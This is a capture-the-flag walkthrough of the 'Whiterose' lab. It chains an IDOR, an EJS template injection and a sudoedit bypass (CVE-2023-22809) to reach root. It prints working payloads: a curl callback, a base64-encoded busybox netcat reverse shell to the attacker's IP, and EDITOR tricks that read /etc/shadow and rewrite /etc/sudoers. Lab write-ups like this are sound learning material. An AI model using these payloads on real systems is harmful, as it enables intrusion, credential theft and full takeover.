Whiterose
Yet another Mr. Robot themed challenge. - by ngn
The following post by 0xb0b is licensed under CC BY 4.0
Recon
We start with an Nmap scan and find two open ports. On port 22 we have SSH and on port 80 we have an ngix/1.14.0 web server.
When visiting the index page of the web servers, we are redirected to cyprusbank.thm. We add this to our /etc/hosts and reload the page.
whiterose.thm → cyprusbank.thm
After we have reloaded the page, we only see a static page without any functionality.
The directory scan did not reveal anything either.
The vhost scan using FFuF had revealed two vhosts, www and admin. Where admin points to a new page that we do not yet know. We add these to our /etc/hosts.
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u http://cyprusbank.thm/ -H "Host:FUZZ.cyprusbank.thm" -fw 1
The directory scan using Feroxbuster does not reveal any other endpoints that we do detect manually too.
Web Access Olivia Cortzez
The index page of admin.cyprusbank.thm redirects us to a login page. Credentials for this login are obtained from the room description.
We can log in as Olivia Cortez, but that user has only have limited permission. We cannot read all the data, and the settings endpoint is not available to us.
Web Access Gayle Bev
But we can take a look at the news history. This is set to ?c=5 during the visit. The parameter c can be checked for IDOR.
http://admin.cyprusbank.thm/messages/?c=5
With the parameter value 0 we find the credentials of an admin user Gayle Bev.
http://admin.cyprusbank.thm/messages/?c=0
We use the found credentials to log in as Gayle Bev and are successful.
We are now able to read the telephone numbers.
Shell as web
As Gayle Bev we do have access to the settings endpoint. We can set the customer's passwords here. What is noticeable is that the passwords are reflected. This immediately draws attention to XSS or SSTI.
If we intercept a request and change it by omitting parameters such as the password, an error message appears. This tells us that ejs files are included.
In our search for SSTI payloads, we'll find the following two sources if ejsis included:
We use the payload from the article and first try to call our web server to test whether it works.
%%1");process.mainModule.require('child_process').execSync('curl http://10.14.90.235');//
We receive direct feedback. Great, we have an SSTI here that we can leverage to RCE.
Next, we prepare a revshell. We use a simple bas64 encoded busybox reverse shell, generated with revshells.com.
Next, we set up a listener and us the following payload to spawn a reverse shell.
name=a&passord=b&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('bash -c "echo YnVzeWJveCBuYyAxMC4xNC45MC4yMzUgNDQ0NSAtZSAvYmluL2Jhc2g= | base64 -d | bash"');//
We receive a connection back and are the user web. In the home directory of web we find the first flag. After we have received our reverse shell, we then upgrade it.
Shell as root
We see that we are allowed to run sudoedit as root without a password using sudo for the specific file /etc/nginx/sites-available/admin.cyprusbank.thm.
After a short search, we find a bypass CVE-2023-22809 for sudoedit. This is applicable to sudo up to version 1.9.12p1. The vulnerability allows us to read and edit any files by specifying the EDITOR variable.
We see that we have installed a vulnerable version of sudo.
With export EDITOR="vi -- /etc/shadow" we attempt to make vi open /etc/shadow directly when sudoedit is used.
export EDITOR="vi -- /etc/shadow"
sudo sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm
And we are able to read /etc/shadows.
Next, we try that with the root flag and are able to read it.
export EDITOR="vi -- /root/root.txt"
sudo sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm
To escalate our privileges to root, we attempt to edit the /etc/sudoers file.
export EDITOR="vi -- /etc/sudoers"
sudo sudoedit /etc/nginx/sites-available/admin.cyprusbank.thmHere we target the line with the command allowing us to execute that specifies the sudoedit command:
web ALL=(root) NOPASSWD: sudoedit /etc/nginx/sites-available/admin.cyprusbank.thmand replace it with the following:
web ALL=(root) NOPASSWD: ALL
Now we are able to execute any command as root without providing a password and use that to switch to the root user. As root we find the final flag at /root/root.txt.
Last updated
Was this helpful?